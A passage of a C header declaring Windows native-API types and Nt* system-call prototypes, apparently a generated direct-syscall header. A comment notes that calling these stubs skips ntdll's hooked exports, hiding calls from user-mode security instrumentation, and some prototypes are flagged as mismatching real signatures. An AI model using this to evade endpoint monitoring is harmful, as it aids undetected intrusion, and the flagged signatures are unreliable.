ULONG PebAddressWow64;
ULONGLONG ManifestAddress;
ULONG ManifestSize;
} SuccessState;
};
} PS_CREATE_INFO, * PPS_CREATE_INFO;
typedef enum _MEMORY_INFORMATION_CLASS
{
MemoryBasicInformation,
MemoryWorkingSetInformation,
MemoryMappedFilenameInformation,
MemoryRegionInformation,
MemoryWorkingSetExInformation,
MemorySharedCommitInformation,
MemoryImageInformation,
MemoryRegionInformationEx,
MemoryPrivilegedBasicInformation,
MemoryEnclaveImageInformation,
MemoryBasicInformationCapped
} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS;
typedef enum _MEMORY_RESERVE_TYPE
{
MemoryReserveUserApc,
MemoryReserveIoCompletion,
MemoryReserveTypeMax
} MEMORY_RESERVE_TYPE, * PMEMORY_RESERVE_TYPE;
typedef enum _ALPC_PORT_INFORMATION_CLASS
{
AlpcBasicInformation,
AlpcPortInformation,
AlpcAssociateCompletionPortInformation,
AlpcConnectedSIDInformation,
AlpcServerInformation,
AlpcMessageZoneInformation,
AlpcRegisterCompletionListInformation,
AlpcUnregisterCompletionListInformation,
AlpcAdjustCompletionListConcurrencyCountInformation,
AlpcRegisterCallbackInformation,
AlpcCompletionListRundownInformation
} ALPC_PORT_INFORMATION_CLASS, * PALPC_PORT_INFORMATION_CLASS;
typedef struct _ALPC_CONTEXT_ATTR
{
PVOID PortContext;
PVOID MessageContext;
ULONG SequenceNumber;
ULONG MessageID;
ULONG CallbackID;
} ALPC_CONTEXT_ATTR, * PALPC_CONTEXT_ATTR;
typedef struct _ALPC_DATA_VIEW_ATTR
{
ULONG Flags;
HANDLE SectionHandle;
PVOID ViewBase;
SIZE_T ViewSize;
} ALPC_DATA_VIEW_ATTR, * PALPC_DATA_VIEW_ATTR;
typedef struct _ALPC_SECURITY_ATTR
{
ULONG Flags;
PSECURITY_QUALITY_OF_SERVICE SecurityQos;
HANDLE ContextHandle;
ULONG Reserved1;
ULONG Reserved2;
} ALPC_SECURITY_ATTR, * PALPC_SECURITY_ATTR;
typedef PVOID* PPVOID;
typedef enum _KPROFILE_SOURCE
{
ProfileTime = 0,
ProfileAlignmentFixup = 1,
ProfileTotalIssues = 2,
ProfilePipelineDry = 3,
ProfileLoadInstructions = 4,
ProfilePipelineFrozen = 5,
ProfileBranchInstructions = 6,
ProfileTotalNonissues = 7,
ProfileDcacheMisses = 8,
ProfileIcacheMisses = 9,
ProfileCacheMisses = 10,
ProfileBranchMispredictions = 11,
ProfileStoreInstructions = 12,
ProfileFpInstructions = 13,
ProfileIntegerInstructions = 14,
Profile2Issue = 15,
Profile3Issue = 16,
Profile4Issue = 17,
ProfileSpecialInstructions = 18,
ProfileTotalCycles = 19,
ProfileIcacheIssues = 20,
ProfileDcacheAccesses = 21,
ProfileMemoryBarrierCycles = 22,
ProfileLoadLinkedIssues = 23,
ProfileMaximum = 24,
} KPROFILE_SOURCE, * PKPROFILE_SOURCE;
typedef enum _ALPC_MESSAGE_INFORMATION_CLASS
{
AlpcMessageSidInformation,
AlpcMessageTokenModifiedIdInformation
} ALPC_MESSAGE_INFORMATION_CLASS, * PALPC_MESSAGE_INFORMATION_CLASS;
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout,
WorkerFactoryRetryTimeout,
WorkerFactoryIdleTimeout,
WorkerFactoryBindingCount,
WorkerFactoryThreadMinimum,
WorkerFactoryThreadMaximum,
WorkerFactoryPaused,
WorkerFactoryBasicInformation,
WorkerFactoryAdjustThreadGoal,
WorkerFactoryCallbackType,
WorkerFactoryStackInformation,
MaxWorkerFactoryInfoClass
} WORKERFACTORYINFOCLASS, * PWORKERFACTORYINFOCLASS;
typedef enum _MEMORY_PARTITION_INFORMATION_CLASS
{
SystemMemoryPartitionInformation,
SystemMemoryPartitionMoveMemory,
SystemMemoryPartitionAddPagefile,
SystemMemoryPartitionCombineMemory,
SystemMemoryPartitionInitialAddMemory,
SystemMemoryPartitionGetMemoryEvents,
SystemMemoryPartitionMax
} MEMORY_PARTITION_INFORMATION_CLASS, * PMEMORY_PARTITION_INFORMATION_CLASS;
typedef enum _MUTANT_INFORMATION_CLASS
{
MutantBasicInformation,
MutantOwnerInformation
} MUTANT_INFORMATION_CLASS, * PMUTANT_INFORMATION_CLASS;
typedef enum _ATOM_INFORMATION_CLASS
{
AtomBasicInformation,
AtomTableInformation
} ATOM_INFORMATION_CLASS, * PATOM_INFORMATION_CLASS;
typedef enum _SHUTDOWN_ACTION {
ShutdownNoReboot,
ShutdownReboot,
ShutdownPowerOff
} SHUTDOWN_ACTION;
typedef VOID(CALLBACK* PTIMER_APC_ROUTINE)(
IN PVOID TimerContext,
IN ULONG TimerLowValue,
IN LONG TimerHighValue);
typedef enum _KEY_VALUE_INFORMATION_CLASS {
KeyValueBasicInformation = 0,
KeyValueFullInformation,
KeyValuePartialInformation,
KeyValueFullInformationAlign64,
KeyValuePartialInformationAlign64,
MaxKeyValueInfoClass
} KEY_VALUE_INFORMATION_CLASS;
typedef LANGID* PLANGID;
typedef struct _PLUGPLAY_EVENT_BLOCK
{
GUID EventGuid;
PLUGPLAY_EVENT_CATEGORY EventCategory;
PULONG Result;
ULONG Flags;
ULONG TotalSize;
PVOID DeviceObject;
union
{
struct
{
GUID ClassGuid;
WCHAR SymbolicLinkName[1];
} DeviceClass;
struct
{
WCHAR DeviceIds[1];
} TargetDevice;
struct
{
WCHAR DeviceId[1];
} InstallDevice;
struct
{
PVOID NotificationStructure;
WCHAR DeviceIds[1];
} CustomNotification;
struct
{
PVOID Notification;
} ProfileNotification;
struct
{
ULONG NotificationCode;
ULONG NotificationData;
} PowerNotification;
struct
{
PNP_VETO_TYPE VetoType;
WCHAR DeviceIdVetoNameBuffer[1]; // DeviceId<null>VetoName<null><null>
} VetoNotification;
struct
{
GUID BlockedDriverGuid;
} BlockedDriverNotification;
struct
{
WCHAR ParentId[1];
} InvalidIDNotification;
} u;
} PLUGPLAY_EVENT_BLOCK, * PPLUGPLAY_EVENT_BLOCK;
typedef VOID(NTAPI* PIO_APC_ROUTINE) (
IN PVOID ApcContext,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG Reserved);
typedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;
typedef enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
{
DirectoryNotifyInformation = 1,
DirectoryNotifyExtendedInformation = 2,
} DIRECTORY_NOTIFY_INFORMATION_CLASS, * PDIRECTORY_NOTIFY_INFORMATION_CLASS;
typedef enum _EVENT_INFORMATION_CLASS
{
EventBasicInformation
} EVENT_INFORMATION_CLASS, * PEVENT_INFORMATION_CLASS;
typedef struct _ALPC_MESSAGE_ATTRIBUTES
{
unsigned long AllocatedAttributes;
unsigned long ValidAttributes;
} ALPC_MESSAGE_ATTRIBUTES, * PALPC_MESSAGE_ATTRIBUTES;
typedef struct _ALPC_PORT_ATTRIBUTES
{
ULONG Flags;
SECURITY_QUALITY_OF_SERVICE SecurityQos;
SIZE_T MaxMessageLength;
SIZE_T MemoryBandwidth;
SIZE_T MaxPoolUsage;
SIZE_T MaxSectionSize;
SIZE_T MaxViewSize;
SIZE_T MaxTotalSectionSize;
ULONG DupObjectTypes;
#ifdef _WIN64
ULONG Reserved;
#endif
} ALPC_PORT_ATTRIBUTES, * PALPC_PORT_ATTRIBUTES;
typedef enum _IO_SESSION_STATE
{
IoSessionStateCreated = 1,
IoSessionStateInitialized = 2,
IoSessionStateConnected = 3,
IoSessionStateDisconnected = 4,
IoSessionStateDisconnectedLoggedOn = 5,
IoSessionStateLoggedOn = 6,
IoSessionStateLoggedOff = 7,
IoSessionStateTerminated = 8,
IoSessionStateMax = 9,
} IO_SESSION_STATE, * PIO_SESSION_STATE;
typedef const WNF_STATE_NAME* PCWNF_STATE_NAME;
typedef const WNF_TYPE_ID* PCWNF_TYPE_ID;
typedef struct _WNF_DELIVERY_DESCRIPTOR
{
unsigned __int64 SubscriptionId;
WNF_STATE_NAME StateName;
unsigned long ChangeStamp;
unsigned long StateDataSize;
unsigned long EventMask;
WNF_TYPE_ID TypeId;
unsigned long StateDataOffset;
} WNF_DELIVERY_DESCRIPTOR, * PWNF_DELIVERY_DESCRIPTOR;
typedef enum _DEBUG_CONTROL_CODE
{
SysDbgQueryModuleInformation = 0,
SysDbgQueryTraceInformation = 1,
SysDbgSetTracePoint = 2,
SysDbgSetSpecialCall = 3,
SysDbgClearSpecialCalls = 4,
SysDbgQuerySpecialCalls = 5,
SysDbgBreakPoint = 6,
SysDbgQueryVersion = 7,
SysDbgReadVirtual = 8,
SysDbgWriteVirtual = 9,
SysDbgReadPhysical = 10,
SysDbgWritePhysical = 11,
SysDbgReadControlSpace = 12,
SysDbgWriteControlSpace = 13,
SysDbgReadIoSpace = 14,
SysDbgWriteIoSpace = 15,
SysDbgReadMsr = 16,
SysDbgWriteMsr = 17,
SysDbgReadBusData = 18,
SysDbgWriteBusData = 19,
SysDbgCheckLowMemory = 20,
SysDbgEnableKernelDebugger = 21,
SysDbgDisableKernelDebugger = 22,
SysDbgGetAutoKdEnable = 23,
SysDbgSetAutoKdEnable = 24,
SysDbgGetPrintBufferSize = 25,
SysDbgSetPrintBufferSize = 26,
SysDbgGetKdUmExceptionEnable = 27,
SysDbgSetKdUmExceptionEnable = 28,
SysDbgGetTriageDump = 29,
SysDbgGetKdBlockEnable = 30,
SysDbgSetKdBlockEnable = 31
} DEBUG_CONTROL_CODE, * PDEBUG_CONTROL_CODE;
typedef struct _PORT_MESSAGE
{
union
{
union
{
struct
{
short DataLength;
short TotalLength;
} s1;
unsigned long Length;
};
} u1;
union
{
union
{
struct
{
short Type;
short DataInfoOffset;
} s2;
unsigned long ZeroInit;
};
} u2;
union
{
CLIENT_ID ClientId;
double DoNotUseThisField;
};
unsigned long MessageId;
union
{
unsigned __int64 ClientViewSize;
struct
{
unsigned long CallbackId;
long __PADDING__[1];
};
};
} PORT_MESSAGE, * PPORT_MESSAGE;
typedef struct FILE_BASIC_INFORMATION
{
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, * PFILE_BASIC_INFORMATION;
typedef struct _PORT_SECTION_READ
{
ULONG Length;
ULONG ViewSize;
ULONG ViewBase;
} PORT_SECTION_READ, * PPORT_SECTION_READ;
typedef struct _PORT_SECTION_WRITE
{
ULONG Length;
HANDLE SectionHandle;
ULONG SectionOffset;
ULONG ViewSize;
PVOID ViewBase;
PVOID TargetViewBase;
} PORT_SECTION_WRITE, * PPORT_SECTION_WRITE;
typedef enum _TIMER_TYPE
{
NotificationTimer,
SynchronizationTimer
} TIMER_TYPE, * PTIMER_TYPE;
typedef struct _BOOT_ENTRY
{
ULONG Version;
ULONG Length;
ULONG Id;
ULONG Attributes;
ULONG FriendlyNameOffset;
ULONG BootFilePathOffset;
ULONG OsOptionsLength;
UCHAR OsOptions[ANYSIZE_ARRAY];
} BOOT_ENTRY, * PBOOT_ENTRY;
typedef struct _EFI_DRIVER_ENTRY
{
ULONG Version;
ULONG Length;
ULONG Id;
ULONG Attributes;
ULONG FriendlyNameOffset;
ULONG DriverFilePathOffset;
} EFI_DRIVER_ENTRY, * PEFI_DRIVER_ENTRY;
typedef USHORT RTL_ATOM, * PRTL_ATOM;
typedef enum _TIMER_SET_INFORMATION_CLASS
{
TimerSetCoalescableTimer,
MaxTimerInfoClass
} TIMER_SET_INFORMATION_CLASS, * PTIMER_SET_INFORMATION_CLASS;
typedef enum _FSINFOCLASS
{
FileFsVolumeInformation = 1,
FileFsLabelInformation = 2,
FileFsSizeInformation = 3,
FileFsDeviceInformation = 4,
FileFsAttributeInformation = 5,
FileFsControlInformation = 6,
FileFsFullSizeInformation = 7,
FileFsObjectIdInformation = 8,
FileFsDriverPathInformation = 9,
FileFsVolumeFlagsInformation = 10,
FileFsSectorSizeInformation = 11,
FileFsDataCopyInformation = 12,
FileFsMetadataSizeInformation = 13,
FileFsFullSizeInformationEx = 14,
FileFsMaximumInformation = 15,
} FSINFOCLASS, * PFSINFOCLASS;
typedef enum _WAIT_TYPE
{
WaitAll = 0,
WaitAny = 1
} WAIT_TYPE, * PWAIT_TYPE;
typedef struct _USER_STACK
{
PVOID FixedStackBase;
PVOID FixedStackLimit;
PVOID ExpandableStackBase;
PVOID ExpandableStackLimit;
PVOID ExpandableStackBottom;
} USER_STACK, * PUSER_STACK;
typedef enum _SECTION_INFORMATION_CLASS
{
SectionBasicInformation,
SectionImageInformation,
} SECTION_INFORMATION_CLASS, * PSECTION_INFORMATION_CLASS;
typedef enum _APPHELPCACHESERVICECLASS
{
ApphelpCacheServiceLookup = 0,
ApphelpCacheServiceRemove = 1,
ApphelpCacheServiceUpdate = 2,
ApphelpCacheServiceFlush = 3,
ApphelpCacheServiceDump = 4,
ApphelpDBGReadRegistry = 0x100,
ApphelpDBGWriteRegistry = 0x101,
} APPHELPCACHESERVICECLASS, * PAPPHELPCACHESERVICECLASS;
typedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION
{
USHORT Version;
USHORT Reserved;
ULONG AttributeCount;
union
{
PTOKEN_SECURITY_ATTRIBUTE_V1 pAttributeV1;
} Attribute;
} TOKEN_SECURITY_ATTRIBUTES_INFORMATION, * PTOKEN_SECURITY_ATTRIBUTES_INFORMATION;
typedef struct _FILE_IO_COMPLETION_INFORMATION
{
PVOID KeyContext;
PVOID ApcContext;
IO_STATUS_BLOCK IoStatusBlock;
} FILE_IO_COMPLETION_INFORMATION, * PFILE_IO_COMPLETION_INFORMATION;
typedef PVOID PT2_CANCEL_PARAMETERS;
typedef enum _THREADINFOCLASS
{
ThreadBasicInformation,
ThreadTimes,
ThreadPriority,
ThreadBasePriority,
ThreadAffinityMask,
ThreadImpersonationToken,
ThreadDescriptorTableEntry,
ThreadEnableAlignmentFaultFixup,
ThreadEventPair_Reusable,
ThreadQuerySetWin32StartAddress,
ThreadZeroTlsCell,
ThreadPerformanceCount,
ThreadAmILastThread,
ThreadIdealProcessor,
ThreadPriorityBoost,
ThreadSetTlsArrayAddress,
ThreadIsIoPending,
ThreadHideFromDebugger,
ThreadBreakOnTermination,
MaxThreadInfoClass
} THREADINFOCLASS, * PTHREADINFOCLASS;
typedef enum _OBJECT_INFORMATION_CLASS
{
ObjectBasicInformation,
ObjectNameInformation,
ObjectTypeInformation,
ObjectAllTypesInformation,
ObjectHandleInformation
} OBJECT_INFORMATION_CLASS, * POBJECT_INFORMATION_CLASS;
typedef enum _FILE_INFORMATION_CLASS
{
FileDirectoryInformation = 1,
FileFullDirectoryInformation = 2,
FileBothDirectoryInformation = 3,
FileBasicInformation = 4,
FileStandardInformation = 5,
FileInternalInformation = 6,
FileEaInformation = 7,
FileAccessInformation = 8,
FileNameInformation = 9,
FileRenameInformation = 10,
FileLinkInformation = 11,
FileNamesInformation = 12,
FileDispositionInformation = 13,
FilePositionInformation = 14,
FileFullEaInformation = 15,
FileModeInformation = 16,
FileAlignmentInformation = 17,
FileAllInformation = 18,
FileAllocationInformation = 19,
FileEndOfFileInformation = 20,
FileAlternateNameInformation = 21,
FileStreamInformation = 22,
FilePipeInformation = 23,
FilePipeLocalInformation = 24,
FilePipeRemoteInformation = 25,
FileMailslotQueryInformation = 26,
FileMailslotSetInformation = 27,
FileCompressionInformation = 28,
FileObjectIdInformation = 29,
FileCompletionInformation = 30,
FileMoveClusterInformation = 31,
FileQuotaInformation = 32,
FileReparsePointInformation = 33,
FileNetworkOpenInformation = 34,
FileAttributeTagInformation = 35,
FileTrackingInformation = 36,
FileIdBothDirectoryInformation = 37,
FileIdFullDirectoryInformation = 38,
FileValidDataLengthInformation = 39,
FileShortNameInformation = 40,
FileIoCompletionNotificationInformation = 41,
FileIoStatusBlockRangeInformation = 42,
FileIoPriorityHintInformation = 43,
FileSfioReserveInformation = 44,
FileSfioVolumeInformation = 45,
FileHardLinkInformation = 46,
FileProcessIdsUsingFileInformation = 47,
FileNormalizedNameInformation = 48,
FileNetworkPhysicalNameInformation = 49,
FileIdGlobalTxDirectoryInformation = 50,
FileIsRemoteDeviceInformation = 51,
FileUnusedInformation = 52,
FileNumaNodeInformation = 53,
FileStandardLinkInformation = 54,
FileRemoteProtocolInformation = 55,
FileRenameInformationBypassAccessCheck = 56,
FileLinkInformationBypassAccessCheck = 57,
FileVolumeNameInformation = 58,
FileIdInformation = 59,
FileIdExtdDirectoryInformation = 60,
FileReplaceCompletionInformation = 61,
FileHardLinkFullIdInformation = 62,
FileIdExtdBothDirectoryInformation = 63,
FileDispositionInformationEx = 64,
FileRenameInformationEx = 65,
FileRenameInformationExBypassAccessCheck = 66,
FileMaximumInformation = 67,
} FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;
typedef enum _KEY_INFORMATION_CLASS
{
KeyBasicInformation = 0,
KeyNodeInformation = 1,
KeyFullInformation = 2,
KeyNameInformation = 3,
KeyCachedInformation = 4,
KeyFlagsInformation = 5,
KeyVirtualizationInformation = 6,
KeyHandleTagsInformation = 7,
MaxKeyInfoClass = 8
} KEY_INFORMATION_CLASS, * PKEY_INFORMATION_CLASS;
// Object-name/security descriptor block passed to the Nt*Open/Create calls
// declared in this header (e.g. NtOpenKey, NtCreateKey). Length must be
// sizeof(OBJECT_ATTRIBUTES); InitializeObjectAttributes above sets every
// field, including SecurityQualityOfService = NULL.
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory; // Handle the ObjectName is relative to, or NULL for an absolute name.
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef enum _TIMER_INFORMATION_CLASS
{
TimerBasicInformation
} TIMER_INFORMATION_CLASS, * PTIMER_INFORMATION_CLASS;
typedef struct _KCONTINUE_ARGUMENT
{
KCONTINUE_TYPE ContinueType;
ULONG ContinueFlags;
ULONGLONG Reserved[2];
} KCONTINUE_ARGUMENT, * PKCONTINUE_ARGUMENT;
EXTERN_C NTSTATUS NtAccessCheck(
IN PSECURITY_DESCRIPTOR pSecurityDescriptor,
IN HANDLE ClientToken,
IN ACCESS_MASK DesiaredAccess,
IN PGENERIC_MAPPING GenericMapping,
OUT PPRIVILEGE_SET PrivilegeSet OPTIONAL,
IN OUT PULONG PrivilegeSetLength,
OUT PACCESS_MASK GrantedAccess,
OUT PBOOLEAN AccessStatus);
EXTERN_C NTSTATUS NtWorkerFactoryWorkerReady(
IN HANDLE WorkerFactoryHandle);
EXTERN_C NTSTATUS NtAcceptConnectPort(
OUT PHANDLE ServerPortHandle,
IN ULONG AlternativeReceivePortHandle OPTIONAL,
IN PPORT_MESSAGE ConnectionReply,
IN BOOLEAN AcceptConnection,
IN OUT PPORT_SECTION_WRITE ServerSharedMemory OPTIONAL,
OUT PPORT_SECTION_READ ClientSharedMemory OPTIONAL);
EXTERN_C NTSTATUS NtMapUserPhysicalPagesScatter(
IN PVOID VirtualAddresses,
IN PULONG NumberOfPages,
IN PULONG UserPfnArray OPTIONAL);
EXTERN_C NTSTATUS NtWaitForSingleObject(
IN HANDLE ObjectHandle,
IN BOOLEAN Alertable,
IN PLARGE_INTEGER TimeOut OPTIONAL);
EXTERN_C NTSTATUS NtCallbackReturn(
IN PVOID OutputBuffer OPTIONAL,
IN ULONG OutputLength,
IN NTSTATUS Status);
EXTERN_C NTSTATUS NtReadFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
OUT PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL);
EXTERN_C NTSTATUS NtDeviceIoControlFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength);
EXTERN_C NTSTATUS NtWriteFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL);
EXTERN_C NTSTATUS NtRemoveIoCompletion(
IN HANDLE IoCompletionHandle,
OUT PULONG KeyContext,
OUT PULONG ApcContext,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtReleaseSemaphore(
IN HANDLE SemaphoreHandle,
IN LONG ReleaseCount,
OUT PLONG PreviousCount OPTIONAL);
EXTERN_C NTSTATUS NtReplyWaitReceivePort(
IN HANDLE PortHandle,
OUT PVOID PortContext OPTIONAL,
IN PPORT_MESSAGE ReplyMessage OPTIONAL,
OUT PPORT_MESSAGE ReceiveMessage);
EXTERN_C NTSTATUS NtReplyPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE ReplyMessage);
EXTERN_C NTSTATUS NtSetInformationThread(
IN HANDLE ThreadHandle,
IN THREADINFOCLASS ThreadInformationClass,
IN PVOID ThreadInformation,
IN ULONG ThreadInformationLength);
// Native (Nt*) system-call prototypes.
//
// Each entry is a C-linkage declaration only: no body is visible here, so the
// symbol is presumably satisfied by a stub elsewhere in the project (this is the
// usual shape of a generated direct-syscall header) -- TODO confirm where the
// definitions live before relying on any of these.
//
// The IN / OUT / OPTIONAL tokens are parameter-direction annotations carried over
// from the DDK style; they document intent only and do not change the C type.
//
// Parameter names/types were copied from public references and a few of them
// disagree with ntdll's real signatures or with sibling entries in this same
// list (flagged inline with NOTE(review)).  Because the stubs are reached
// directly instead of through ntdll's exported Nt* entry points, user-mode
// instrumentation that hooks those exports will not observe these calls;
// kernel-side telemetry still does.
EXTERN_C NTSTATUS NtSetEvent(
IN HANDLE EventHandle,
OUT PULONG PreviousState OPTIONAL);
EXTERN_C NTSTATUS NtClose(
IN HANDLE Handle);
EXTERN_C NTSTATUS NtQueryObject(
IN HANDLE Handle,
IN OBJECT_INFORMATION_CLASS ObjectInformationClass,
OUT PVOID ObjectInformation OPTIONAL,
IN ULONG ObjectInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass);
EXTERN_C NTSTATUS NtOpenKey(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtEnumerateValueKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
OUT PVOID KeyValueInformation OPTIONAL,
IN ULONG Length,
OUT PULONG ResultLength);
EXTERN_C NTSTATUS NtFindAtom(
IN PWSTR AtomName OPTIONAL,
IN ULONG Length,
OUT PUSHORT Atom OPTIONAL);
EXTERN_C NTSTATUS NtQueryDefaultLocale(
IN BOOLEAN UserProfile,
OUT PLCID DefaultLocaleId);
EXTERN_C NTSTATUS NtQueryKey(
IN HANDLE KeyHandle,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation OPTIONAL,
IN ULONG Length,
OUT PULONG ResultLength);
EXTERN_C NTSTATUS NtQueryValueKey(
IN HANDLE KeyHandle,
IN PUNICODE_STRING ValueName,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
OUT PVOID KeyValueInformation OPTIONAL,
IN ULONG Length,
OUT PULONG ResultLength);
// BaseAddress / RegionSize are in-out: the caller passes the address of its own
// pointer / size and reads the rounded values back.  Compare NtMapViewOfSection
// below, which does NOT take a pointer-to-pointer as declared here.
EXTERN_C NTSTATUS NtAllocateVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID* BaseAddress,
IN ULONG ZeroBits,
IN OUT PSIZE_T RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
EXTERN_C NTSTATUS NtQueryInformationProcess(
IN HANDLE ProcessHandle,
IN PROCESSINFOCLASS ProcessInformationClass,
OUT PVOID ProcessInformation,
IN ULONG ProcessInformationLength,
OUT PULONG ReturnLength OPTIONAL);
// Same parameter list as NtWaitForMultipleObjects further down (Count vs
// ObjectCount is only a naming difference).
EXTERN_C NTSTATUS NtWaitForMultipleObjects32(
IN ULONG ObjectCount,
IN PHANDLE Handles,
IN WAIT_TYPE WaitType,
IN BOOLEAN Alertable,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtWriteFileGather(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PFILE_SEGMENT_ELEMENT SegmentArray,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset,
IN PULONG Key OPTIONAL);
EXTERN_C NTSTATUS NtCreateKey(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG TitleIndex,
IN PUNICODE_STRING Class OPTIONAL,
IN ULONG CreateOptions,
OUT PULONG Disposition OPTIONAL);
EXTERN_C NTSTATUS NtFreeVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID* BaseAddress,
IN OUT PSIZE_T RegionSize,
IN ULONG FreeType);
EXTERN_C NTSTATUS NtImpersonateClientOfPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE Message);
EXTERN_C NTSTATUS NtReleaseMutant(
IN HANDLE MutantHandle,
OUT PULONG PreviousCount OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationToken(
IN HANDLE TokenHandle,
IN TOKEN_INFORMATION_CLASS TokenInformationClass,
OUT PVOID TokenInformation,
IN ULONG TokenInformationLength,
OUT PULONG ReturnLength);
EXTERN_C NTSTATUS NtRequestWaitReplyPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE RequestMessage,
OUT PPORT_MESSAGE ReplyMessage);
EXTERN_C NTSTATUS NtQueryVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
OUT PVOID MemoryInformation,
IN SIZE_T MemoryInformationLength,
OUT PSIZE_T ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtOpenThreadToken(
IN HANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN BOOLEAN OpenAsSelf,
OUT PHANDLE TokenHandle);
EXTERN_C NTSTATUS NtQueryInformationThread(
IN HANDLE ThreadHandle,
IN THREADINFOCLASS ThreadInformationClass,
OUT PVOID ThreadInformation,
IN ULONG ThreadInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtOpenProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL);
EXTERN_C NTSTATUS NtSetInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass);
// NOTE(review): ntdll's NtMapViewOfSection takes `PVOID *BaseAddress` (the
// mapped base is returned through it), but this prototype declares a plain
// `PVOID`.  A caller must still pass `&base` -- the declared type will not
// catch a plain `base` being passed by value.  Consider aligning it with the
// `PVOID*` form used by NtAllocateVirtualMemory above; check call sites first.
EXTERN_C NTSTATUS NtMapViewOfSection(
IN HANDLE SectionHandle,
IN HANDLE ProcessHandle,
IN OUT PVOID BaseAddress,
IN ULONG ZeroBits,
IN SIZE_T CommitSize,
IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
IN OUT PSIZE_T ViewSize,
IN SECTION_INHERIT InheritDisposition,
IN ULONG AllocationType,
IN ULONG Win32Protect);
EXTERN_C NTSTATUS NtAccessCheckAndAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN PUNICODE_STRING ObjectTypeName,
IN PUNICODE_STRING ObjectName,
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN ACCESS_MASK DesiredAccess,
IN PGENERIC_MAPPING GenericMapping,
IN BOOLEAN ObjectCreation,
OUT PACCESS_MASK GrantedAccess,
OUT PBOOLEAN AccessStatus,
OUT PBOOLEAN GenerateOnClose);
EXTERN_C NTSTATUS NtUnmapViewOfSection(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress);
EXTERN_C NTSTATUS NtReplyWaitReceivePortEx(
IN HANDLE PortHandle,
OUT PULONG PortContext OPTIONAL,
IN PPORT_MESSAGE ReplyMessage OPTIONAL,
OUT PPORT_MESSAGE ReceiveMessage,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtTerminateProcess(
IN HANDLE ProcessHandle OPTIONAL,
IN NTSTATUS ExitStatus);
EXTERN_C NTSTATUS NtSetEventBoostPriority(
IN HANDLE EventHandle);
EXTERN_C NTSTATUS NtReadFileScatter(
